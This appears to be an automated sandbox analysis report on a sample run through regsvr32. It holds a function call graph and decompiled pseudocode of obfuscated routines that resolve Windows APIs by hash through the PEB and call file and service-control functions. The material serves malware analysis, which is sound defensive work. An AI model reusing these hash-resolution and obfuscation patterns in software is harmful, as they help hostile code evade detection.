4585->4583 4586 99e29a GetPEB 4585->4586 4635 9941cf 4585->4635 4644 985797 4585->4644 4648 985b8a 4585->4648 4651 986505 4585->4651 4655 98400f 4585->4655 4659 99aeae 4585->4659 4663 99b215 4585->4663 4586->4585 4595 9a2a55 4587->4595 4589 9a2bb0 4591 986a8d GetPEB 4589->4591 4590 99eaa3 2 API calls 4590->4595 4592 9a2bae 4591->4592 4592->4043 4593 984bb4 2 API calls 4593->4595 4594 98f56b GetPEB 4594->4595 4595->4589 4595->4590 4595->4592 4595->4593 4595->4594 4596 98b9d7 GetPEB 4595->4596 4679 9951e8 4595->4679 4596->4595 4606 999fc8 4597->4606 4598 986a8d GetPEB 4598->4606 4599 99a353 4600 99e18b 2 API calls 4599->4600 4602 99a379 4600->4602 4601 991d1c GetPEB 4601->4606 4698 98c4b0 4602->4698 4603 99eaa3 RtlAllocateHeap GetPEB 4603->4606 4606->4598 4606->4599 4606->4601 4606->4603 4607 984bb4 2 API calls 4606->4607 4611 98f56b GetPEB 4606->4611 4612 99a34e 4606->4612 4613 98b9d7 GetPEB 4606->4613 4690 99e18b 4606->4690 4694 999556 4606->4694 4607->4606 4610 98b9d7 GetPEB 4610->4612 4611->4606 4612->4043 4613->4606 4615 9991ae 4614->4615 4616 999537 4615->4616 4619 999535 4615->4619 4621 99eaa3 2 API calls 4615->4621 4622 991d1c GetPEB 4615->4622 4702 9916ad 4615->4702 4708 989617 4615->4708 4618 986a8d GetPEB 4616->4618 4618->4619 4619->4043 4621->4615 4622->4615 4624 9947fd 4623->4624 4625 99500a 4624->4625 4630 986a8d GetPEB 4624->4630 4631 98e379 2 API calls 4624->4631 4632 99501e 4624->4632 4633 991d1c GetPEB 4624->4633 4634 99eaa3 2 API calls 4624->4634 4750 984342 4624->4750 4755 99a4b5 4624->4755 4762 988bcb 4624->4762 4629 986a8d GetPEB 4625->4629 4629->4632 4630->4624 4631->4624 4632->4043 4633->4624 4634->4624 4637 994420 4635->4637 4636 994518 4638 994520 4636->4638 4640 986a8d GetPEB 4636->4640 4637->4636 4641 99eaa3 RtlAllocateHeap GetPEB 4637->4641 4642 991d1c GetPEB 4637->4642 4643 986a8d GetPEB 4637->4643 4671 987209 4637->4671 4638->4585 4640->4638 4641->4637 4642->4637 4643->4637 4645 9857d2 4644->4645 4646 99bff0 GetPEB 4645->4646 4647 
985872 4646->4647 4647->4585 4675 9a1933 4648->4675 4652 98652a 4651->4652 4653 99bff0 GetPEB 4652->4653 4654 9865c3 4653->4654 4654->4585 4656 984036 4655->4656 4657 99bff0 GetPEB 4656->4657 4658 9840bd 4657->4658 4658->4585 4660 99aedf 4659->4660 4661 99bff0 GetPEB 4660->4661 4662 99af74 4661->4662 4662->4585 4664 99b237 4663->4664 4665 99bff0 GetPEB 4664->4665 4666 99b2e9 4665->4666 4666->4585 4668 995b62 4667->4668 4669 99bff0 GetPEB 4668->4669 4670 995bfa 4669->4670 4670->4577 4672 98722b 4671->4672 4673 99bff0 GetPEB 4672->4673 4674 9872b9 4673->4674 4674->4637 4676 9a1957 4675->4676 4677 99bff0 GetPEB 4676->4677 4678 985c87 4677->4678 4678->4585 4683 9951fe 4679->4683 4680 99545d 4682 98c63a GetPEB 4680->4682 4681 99545b 4681->4595 4682->4681 4683->4680 4683->4681 4685 99eaa3 2 API calls 4683->4685 4686 98c63a 4683->4686 4685->4683 4687 98c662 4686->4687 4688 99bff0 GetPEB 4687->4688 4689 98c6f0 4688->4689 4689->4683 4691 99e1a5 4690->4691 4692 99eaa3 2 API calls 4691->4692 4693 99e230 4692->4693 4693->4606 4693->4693 4695 99957e 4694->4695 4696 98f56b GetPEB 4695->4696 4697 9995a0 4696->4697 4697->4606 4699 98c4c9 4698->4699 4700 98f56b GetPEB 4699->4700 4701 98c4e3 4700->4701 4701->4610 4703 9916c7 4702->4703 4704 9918a9 4703->4704 4707 9918a7 4703->4707 4715 98e379 4703->4715 4730 99595c 4704->4730 4707->4615 4711 989644 4708->4711 4709 99eaa3 2 API calls 4709->4711 4710 9912ef GetPEB 4710->4711 4711->4709 4711->4710 4712 989996 4711->4712 4713 989985 4711->4713 4712->4615 4714 986a8d GetPEB 4713->4714 4714->4712 4728 98e3b8 4715->4728 4716 98f19d 4717 98d5cb GetPEB 4716->4717 4718 98f19b 4717->4718 4718->4703 4720 99eaa3 2 API calls 4720->4728 4722 9865d5 GetPEB 4722->4728 4724 986a8d GetPEB 4724->4728 4726 984bb4 RtlAllocateHeap GetPEB 4726->4728 4727 98d68b GetPEB 4727->4728 4728->4716 4728->4718 4728->4720 4728->4722 4728->4724 4728->4726 4728->4727 4729 98b9d7 GetPEB 4728->4729 4734 9841c6 4728->4734 4738 98b8f4 4728->4738 4742 98fb23 4728->4742 4746 
99ac2c 4728->4746 4729->4728 4731 995988 4730->4731 4732 99bff0 GetPEB 4731->4732 4733 995a2b 4732->4733 4733->4707 4735 9841eb 4734->4735 4736 99bff0 GetPEB 4735->4736 4737 984279 4736->4737 4737->4728 4739 98b919 4738->4739 4740 99bff0 GetPEB 4739->4740 4741 98b9c4 4740->4741 4741->4728 4743 98fb3c 4742->4743 4744 99bff0 GetPEB 4743->4744 4745 98fbed 4744->4745 4745->4728 4747 99ac56 4746->4747 4748 99bff0 GetPEB 4747->4748 4749 99ace2 4748->4749 4749->4728 4752 984361 4750->4752 4751 9845f4 4751->4624 4752->4751 4753 984627 GetPEB 4752->4753 4754 99eaa3 2 API calls 4752->4754 4753->4752 4754->4752 4756 99a4e1 4755->4756 4757 99e436 GetPEB 4756->4757 4758 99a872 4756->4758 4759 99a861 4756->4759 4760 99eaa3 2 API calls 4756->4760 4757->4756 4758->4624 4761 986a8d GetPEB 4759->4761 4760->4756 4761->4758 4763 988bde 4762->4763 4764 991d1c GetPEB 4763->4764 4765 988c72 4764->4765 4765->4624 4767 9a041a 4766->4767 4769 9a06d7 4767->4769 4777 9a0738 4767->4777 4787 986bfa 4767->4787 4770 99e18b 2 API calls 4769->4770 4771 9a06f1 4770->4771 4778 99112d 4771->4778 4776 98b9d7 GetPEB 4776->4777 4777->4047 4791 984b09 4778->4791 4782 9912e4 4783 99ef56 4782->4783 4784 99ef7b 4783->4784 4785 98f56b GetPEB 4784->4785 4786 99ef98 4785->4786 4786->4776 4788 986c16 4787->4788 4789 99bff0 GetPEB 4788->4789 4790 986cad 4789->4790 4790->4767 4792 984b23 4791->4792 4793 99bff0 GetPEB 4792->4793 4794 984ba7 4793->4794 4794->4782 4795 99683f 4794->4795 4796 996871 4795->4796 4797 99bff0 GetPEB 4796->4797 4798 996911 4797->4798 4798->4782 4804 98bcba 4799->4804 4800 98bd24 4800->4059 4801 986a8d GetPEB 4801->4804 4802 984cb9 GetPEB 4802->4804 4804->4800 4804->4801 4804->4802 4805 99e373 2 API calls 4804->4805 4893 990f7a 4804->4893 4805->4804 4807 9a0d01 4806->4807 4808 9a0d19 4807->4808 4809 989574 GetPEB 4807->4809 4811 9a0d42 4807->4811 4812 98ffde GetPEB 4807->4812 4814 984bb4 2 API calls 4807->4814 4815 99734a GetPEB 4807->4815 4816 98b9d7 GetPEB 4807->4816 4911 98b200 
4807->4911 4915 989b80 4807->4915 4901 9963f0 4808->4901 4809->4807 4811->4059 4812->4807 4814->4807 4815->4807 4816->4807 4930 99e034 4818->4930 4820 9963f0 3 API calls 4836 99fedc 4820->4836 4821 9966c2 2 API calls 4821->4836 4822 9a02ff 4827 99e373 2 API calls 4822->4827 4823 99ade9 GetPEB 4823->4836 4824 9951e8 2 API calls 4824->4836 4826 9a02fd 4826->4059 4827->4826 4829 989574 GetPEB 4829->4836 4830 991bed GetPEB 4830->4836 4831 986a8d GetPEB 4831->4836 4832 98ffde GetPEB 4832->4836 4833 98b200 GetPEB 4833->4836 4834 984bb4 RtlAllocateHeap GetPEB 4834->4836 4835 99734a GetPEB 4835->4836 4836->4820 4836->4821 4836->4822 4836->4823 4836->4824 4836->4826 4836->4829 4836->4830 4836->4831 4836->4832 4836->4833 4836->4834 4836->4835 4837 98b9d7 GetPEB 4836->4837 4838 989b80 3 API calls 4836->4838 4933 98f784 4836->4933 4939 98d7a6 4836->4939 4837->4836 4838->4836 4841 982bc8 4839->4841 4840 9963f0 3 API calls 4840->4841 4841->4840 4844 989574 GetPEB 4841->4844 4845 9830be GetPEB 4841->4845 4846 99e373 GetPEB CloseHandle 4841->4846 4848 98ffde GetPEB 4841->4848 4849 982c16 4841->4849 4851 982c31 4841->4851 4852 98b200 GetPEB 4841->4852 4853 984bb4 2 API calls 4841->4853 4854 99734a GetPEB 4841->4854 4855 98b9d7 GetPEB 4841->4855 4856 989b80 3 API calls 4841->4856 4943 9a0e6d 4841->4943 4951 98fbf8 4841->4951 4954 98db59 4841->4954 4844->4841 4845->4841 4846->4841 4848->4841 4850 99e373 2 API calls 4849->4850 4850->4851 4851->4059 4852->4841 4853->4841 4854->4841 4855->4841 4856->4841 4859 98d206 4857->4859 4858 98d24f 4858->4059 4859->4858 4860 99aa59 GetPEB 4859->4860 4862 98d23b 4859->4862 4985 983c51 4859->4985 4993 990e0b 4859->4993 4860->4859 4863 990f7a GetPEB 4862->4863 4863->4858 4867 9a1738 4865->4867 4866 99aa59 GetPEB 4866->4867 4867->4866 4868 9a176d 4867->4868 4869 983c51 GetPEB 4867->4869 4871 9a1781 4867->4871 4872 990e0b GetPEB 4867->4872 4870 990f7a GetPEB 4868->4870 4869->4867 4870->4871 4871->4059 4872->4867 4884 99710c 4873->4884 4874 989574 
GetPEB 4874->4884 4875 997210 4875->4059 4875->4875 4876 997128 4877 9966c2 2 API calls 4876->4877 4879 99715b 4877->4879 4878 98ffde GetPEB 4878->4884 4880 984bb4 2 API calls 4879->4880 4882 99717e 4880->4882 4881 98b200 GetPEB 4881->4884 4883 99734a GetPEB 4882->4883 4885 9971be 4883->4885 4884->4874 4884->4875 4884->4876 4884->4878 4884->4881 4886 984bb4 2 API calls 4884->4886 4888 99734a GetPEB 4884->4888 4891 98b9d7 GetPEB 4884->4891 4892 989b80 3 API calls 4884->4892 4887 98b9d7 GetPEB 4885->4887 4886->4884 4889 9971d6 4887->4889 4888->4884 4890 9963f0 3 API calls 4889->4890 4890->4875 4891->4884 4892->4884 4894 990f8d 4893->4894 4897 9a1bd6 4894->4897 4898 9a1bf5 4897->4898 4899 99bff0 GetPEB 4898->4899 4900 991069 4899->4900 4900->4804 4902 99641e 4901->4902 4903 98b184 GetPEB 4902->4903 4904 99663b 4903->4904 4922 9946e0 4904->4922 4906 996683 4906->4811 4907 996676 4907->4906 4908 99e373 2 API calls 4907->4908 4909 9966a3 4908->4909 4910 99e373 2 API calls 4909->4910 4910->4906 4912 98b219 4911->4912 4913 98f2b9 GetPEB 4912->4913 4914 98b2e7 4913->4914 4914->4807 4917 989b9f 4915->4917 4918 989e5e 4917->4918 4919 99bf1c 2 API calls 4917->4919 4921 989e5c 4917->4921 4926 99454e 4917->4926 4920 99e373 2 API calls 4918->4920 4919->4917 4920->4921 4921->4807 4923 99471e 4922->4923 4924 99bff0 GetPEB 4923->4924 4925 9947b3 CreateProcessW 4924->4925 4925->4907 4927 994575 4926->4927 4928 99bff0 GetPEB 4927->4928 4929 994615 4928->4929 4929->4917 4931 99bff0 GetPEB 4930->4931 4932 99e0c1 4931->4932 4932->4836 4934 98f7a0 4933->4934 4935 98f983 4934->4935 4936 98f985 4934->4936 4938 99eaa3 2 API calls 4934->4938 4935->4836 4937 984627 GetPEB 4936->4937 4937->4935 4938->4934 4940 98d7d6 4939->4940 4941 99bff0 GetPEB 4940->4941 4942 98d87c 4941->4942 4942->4836 4944 9a0e92 4943->4944 4946 98fbf8 GetPEB 4944->4946 4947 9a1061 4944->4947 4950 9a1076 4944->4950 4965 99d0a1 4944->4965 4969 982f1a 4944->4969 4946->4944 4949 99e373 2 API calls 4947->4949 4949->4950 
4950->4841 4952 99bff0 GetPEB 4951->4952 4953 98fcac 4952->4953 4953->4841 4955 98db99 4954->4955 4957 98b184 GetPEB 4955->4957 4958 98df48 4955->4958 4959 984bb4 2 API calls 4955->4959 4961 98e07b 4955->4961 4964 98b9d7 GetPEB 4955->4964 4977 995a47 4955->4977 4981 99e8e7 4955->4981 4957->4955 4973 9a1d6d 4958->4973 4959->4955 4961->4961 4964->4955 4966 99d0bd 4965->4966 4967 99bff0 GetPEB 4966->4967 4968 99d13e 4967->4968 4968->4944 4970 982f3e 4969->4970 4971 99bff0 GetPEB 4970->4971 4972 982fcc 4971->4972 4972->4944 4974 9a1d80 4973->4974 4975 99bff0 GetPEB 4974->4975 4976 98df59 4975->4976 4976->4841 4978 995a82 4977->4978 4979 99bff0 GetPEB 4978->4979 4980 995b29 4979->4980 4980->4955 4982 99e902 4981->4982 4983 99bff0 GetPEB 4982->4983 4984 99e994 4983->4984 4984->4955 4986 983c6f 4985->4986 4987 983eff 4986->4987 4998 993ff6 4986->4998 4987->4859 4990 991d1c GetPEB 4991 983eb6 4990->4991 4991->4987 4992 991d1c GetPEB 4991->4992 4992->4991 4996 990e27 4993->4996 4994 990f48 4994->4859 4995 99e9a4 GetPEB 4995->4996 4996->4994 4996->4995 5002 983455 4996->5002 4999 994017 4998->4999 5000 99bff0 GetPEB 4999->5000 5001 983e94 5000->5001 5001->4987 5001->4990 5003 983468 5002->5003 5004 99bff0 GetPEB 5003->5004 5005 983502 5004->5005 5005->4996 5007 99da29 5006->5007 5008 99bff0 GetPEB 5007->5008 5009 983149 5008->5009 5009->3871 5011 995cca 5010->5011 5012 99bff0 GetPEB 5011->5012 5013 995d5a 5012->5013 5013->4075 5016 9900ae 5014->5016 5015 997394 GetPEB 5015->5016 5016->5015 5017 99eaa3 2 API calls 5016->5017 5018 99040e 5016->5018 5017->5016 5018->4075 5020 98f61e 5019->5020 5021 99bff0 GetPEB 5020->5021 5022 98f6be 5021->5022 5022->4075 5024 99bff0 GetPEB 5023->5024 5025 98e370 5024->5025 5025->4075 5027 98f9bd 5026->5027 5028 99bff0 GetPEB 5027->5028 5029 98fa61 5028->5029 5029->4082 5031 995c1b 5030->5031 5032 99bff0 GetPEB 5031->5032 5033 995ca5 5032->5033 5033->4087 5035 98e0fe 5034->5035 5036 99bff0 GetPEB 5035->5036 5037 98e19d 5036->5037 5037->4087 
5041 98d8af 5038->5041 5039 98da67 5062 98ff02 5039->5062 5041->5039 5043 98b184 GetPEB 5041->5043 5044 98da65 5041->5044 5058 991c3c 5041->5058 5043->5041 5044->4101 5050 989425 5045->5050 5046 984bb4 2 API calls 5046->5050 5047 98954c 5049 983152 GetPEB 5047->5049 5048 983f09 GetPEB 5048->5050 5051 98954a 5049->5051 5050->5046 5050->5047 5050->5048 5050->5051 5053 98b9d7 GetPEB 5050->5053 5066 99462a 5050->5066 5051->4101 5053->5050 5055 98f6e5 5054->5055 5056 99bff0 GetPEB 5055->5056 5057 98f778 5056->5057 5057->4111 5059 991c5e 5058->5059 5060 99bff0 GetPEB 5059->5060 5061 991d0f 5060->5061 5061->5041 5063 98ff24 5062->5063 5064 99bff0 GetPEB 5063->5064 5065 98ffca 5064->5065 5065->5044 5067 994649 5066->5067 5068 99bff0 GetPEB 5067->5068 5069 9946d3 5068->5069 5069->5050 5080 985c9a 5087 98617c 5080->5087 5081 986a8d GetPEB 5081->5087 5082 99bf1c 2 API calls 5082->5087 5083 98638d 5084 989574 GetPEB 5084->5087 5085 98638f 5088 99e373 2 API calls 5085->5088 5087->5081 5087->5082 5087->5083 5087->5084 5087->5085 5089 98ffde GetPEB 5087->5089 5090 99eaa3 2 API calls 5087->5090 5093 99ab39 5087->5093 5097 99589f 5087->5097 5101 9a2727 5087->5101 5088->5083 5089->5087 5090->5087 5094 99ab6c 5093->5094 5095 99bff0 GetPEB 5094->5095 5096 99ac10 5095->5096 5096->5087 5098 9958b2 5097->5098 5099 99bff0 GetPEB 5098->5099 5100 995949 5099->5100 5100->5087 5102 9a2737 5101->5102 5103 99bff0 GetPEB 5102->5103 5104 9a27d3 5103->5104 5104->5087 5105 9872cc 5106 98ffde GetPEB 5105->5106 5107 98750d 5106->5107 5108 99589f GetPEB 5107->5108 5109 987520 5108->5109 5110 984bb4 2 API calls 5109->5110 5117 98758b 5109->5117 5111 98753e 5110->5111 5112 99734a GetPEB 5111->5112 5113 987568 5112->5113 5114 98b9d7 GetPEB 5113->5114 5115 987577 5114->5115 5116 989ea8 2 API calls 5115->5116 5116->5117 5070 9963f0 5071 99641e 5070->5071 5072 98b184 GetPEB 5071->5072 5073 99663b 5072->5073 5074 9946e0 2 API calls 5073->5074 5076 996676 5074->5076 5075 996683 5076->5075 5077 99e373 2 API 
calls 5076->5077 5078 9966a3 5077->5078 5079 99e373 2 API calls 5078->5079 5079->5075 5118 9888e5 5119 988a5e 5118->5119 5120 988aa9 5119->5120 5121 99e18b 2 API calls 5119->5121 5122 988a79 5121->5122 5126 9908c0 5122->5126 5125 98b9d7 GetPEB 5125->5120 5127 9908e5 5126->5127 5129 988a91 5127->5129 5130 9919a4 5127->5130 5129->5125 5131 9919bd 5130->5131 5132 99bff0 GetPEB 5131->5132 5133 991a63 5132->5133 5133->5127
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0098F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				void* _t49;
                                                                                                                				intOrPtr* _t58;
                                                                                                                				void* _t59;
                                                                                                                				signed int _t62;
                                                                                                                				void* _t67;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_t68 = __edx;
                                                                                                                				_t67 = __ecx;
                                                                                                                				E00989E7D(_t49);
                                                                                                                				_v36 = 0xea873e;
                                                                                                                				_v32 = 0xb2392b;
                                                                                                                				_v28 = 0;
                                                                                                                				_v24 = 0;
                                                                                                                				_v12 = 0xdc192d;
                                                                                                                				_v12 = _v12 >> 0xa;
                                                                                                                				_v12 = _v12 >> 0xf;
                                                                                                                				_v12 = _v12 + 0x11b5;
                                                                                                                				_v12 = _v12 ^ 0x0007f5c7;
                                                                                                                				_v20 = 0x6dcef4;
                                                                                                                				_t62 = 0x6b;
                                                                                                                				_v20 = _v20 * 0x54;
                                                                                                                				_v20 = _v20 << 0x10;
                                                                                                                				_v20 = _v20 ^ 0xe81a0a50;
                                                                                                                				_v16 = 0x9ccfab;
                                                                                                                				_v16 = _v16 | 0xc76ed5d6;
                                                                                                                				_v16 = _v16 >> 0xf;
                                                                                                                				_v16 = _v16 ^ 0x000c5bda;
                                                                                                                				_v8 = 0xcca784;
                                                                                                                				_v8 = _v8 / _t62;
                                                                                                                				_v8 = _v8 >> 0xf;
                                                                                                                				_v8 = _v8 ^ 0x01549e3f;
                                                                                                                				_v8 = _v8 ^ 0x01571d5c;
                                                                                                                				_t58 = E0099BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
                                                                                                                				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
                                                                                                                				return _t59;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 0098F2B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction ID: dc3815b0d37b00f17330572a4786bc6def74230763cbd9f73a955ff3d1942971
                                                                                                                • Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction Fuzzy Hash: C52144B5D0121DAFDB08DFA5C88A9EEBBB4FB44708F10809DE515AA240C7B45B54DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 498 9832b5-98338a call 989e7d call 99bff0 OpenSCManagerW
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E009832B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				short* _v24;
                                                                                                                				short* _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t49;
                                                                                                                				void* _t62;
                                                                                                                				signed int _t64;
                                                                                                                				signed int _t65;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				E00989E7D(_t49);
                                                                                                                				_v32 = 0xf329ca;
                                                                                                                				_v28 = 0;
                                                                                                                				_v24 = 0;
                                                                                                                				_v16 = 0x2373b;
                                                                                                                				_t64 = 0x7a;
                                                                                                                				_v16 = _v16 * 0x75;
                                                                                                                				_t65 = 0x3d;
                                                                                                                				_v16 = _v16 / _t64;
                                                                                                                				_v16 = _v16 ^ 0x00061266;
                                                                                                                				_v12 = 0xb7be71;
                                                                                                                				_v12 = _v12 >> 0xb;
                                                                                                                				_v12 = _v12 + 0xafdb;
                                                                                                                				_v12 = _v12 ^ 0x7920a4e8;
                                                                                                                				_v12 = _v12 ^ 0x79205c77;
                                                                                                                				_v8 = 0x1abc5;
                                                                                                                				_v8 = _v8 / _t65;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 ^ 0x07f89b39;
                                                                                                                				_v8 = _v8 ^ 0x07caeaee;
                                                                                                                				_v20 = 0x49b926;
                                                                                                                				_v20 = _v20 * 0x47;
                                                                                                                				_v20 = _v20 ^ 0x147483b3;
                                                                                                                				E0099BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
                                                                                                                				_t62 = OpenSCManagerW(0, 0, _a4); // executed
                                                                                                                				return _t62;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 00983384
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: w\ y
                                                                                                                • API String ID: 1889721586-240614871
                                                                                                                • Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction ID: 1d930cecceb09b3cdc5be659920f6d67a41c167dcf51d783231f91b1c51f3e85
                                                                                                                • Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction Fuzzy Hash: 2E2123B5D01228FBCB04EFA9D84A9EEBFB5FB40304F208189E425A6251D3B55B40DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 503 98c4eb-98c5c2 call 989e7d call 99bff0 OpenServiceW
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0098C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				void* _t46;
                                                                                                                				void* _t54;
                                                                                                                				int _t58;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t58 = __edx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E00989E7D(_t46);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v36 = 0xd40f1;
                                                                                                                				_v32 = 0xcb52a0;
                                                                                                                				_v28 = 0x146fa1;
                                                                                                                				_v20 = 0xb8dab7;
                                                                                                                				_v20 = _v20 >> 1;
                                                                                                                				_v20 = _v20 << 5;
                                                                                                                				_v20 = _v20 ^ 0x0b80f677;
                                                                                                                				_v8 = 0x87dd92;
                                                                                                                				_v8 = _v8 + 0xffffe9d3;
                                                                                                                				_v8 = _v8 * 0x55;
                                                                                                                				_v8 = _v8 << 0xa;
                                                                                                                				_v8 = _v8 ^ 0x54d92ec5;
                                                                                                                				_v16 = 0xb88fea;
                                                                                                                				_v16 = _v16 | 0xf85cd4fd;
                                                                                                                				_v16 = _v16 + 0xed22;
                                                                                                                				_v16 = _v16 ^ 0xf8f0d6dc;
                                                                                                                				_v12 = 0x2c3d87;
                                                                                                                				_v12 = _v12 + 0x3690;
                                                                                                                				_v12 = _v12 + 0xfffff048;
                                                                                                                				_v12 = _v12 ^ 0x0029d00c;
                                                                                                                				E0099BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
                                                                                                                				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
                                                                                                                				return _t54;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 0098C5BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.456297970.00000000009A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: "
                                                                                                                • API String ID: 3098006287-1598837362
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 508 99a98e-99aa51 call 989e7d call 99bff0 CloseServiceHandle
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0099A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t45;
                                                                                                                				int _t58;
                                                                                                                				signed int _t60;
                                                                                                                				signed int _t61;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				E00989E7D(_t45);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v28 = 0xdfb18c;
                                                                                                                				_v12 = 0xac05d3;
                                                                                                                				_v12 = _v12 + 0xffffe692;
                                                                                                                				_t60 = 6;
                                                                                                                				_v12 = _v12 * 0xa;
                                                                                                                				_v12 = _v12 ^ 0x06b0bc77;
                                                                                                                				_v20 = 0xcbcea5;
                                                                                                                				_t61 = 0x73;
                                                                                                                				_v20 = _v20 / _t60;
                                                                                                                				_v20 = _v20 ^ 0x0026c0c8;
                                                                                                                				_v16 = 0x706a69;
                                                                                                                				_v16 = _v16 + 0xffff322e;
                                                                                                                				_v16 = _v16 ^ 0x006745ff;
                                                                                                                				_v8 = 0xc7f3e7;
                                                                                                                				_v8 = _v8 * 0x7b;
                                                                                                                				_v8 = _v8 + 0xffffee1e;
                                                                                                                				_v8 = _v8 / _t61;
                                                                                                                				_v8 = _v8 ^ 0x00d4d133;
                                                                                                                				E0099BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
                                                                                                                				_t58 = CloseServiceHandle(_a4); // executed
                                                                                                                				return _t58;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 0099AA4C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.456283175.0000000000980000.00000004.00000800.00020000.00000000.sdmp
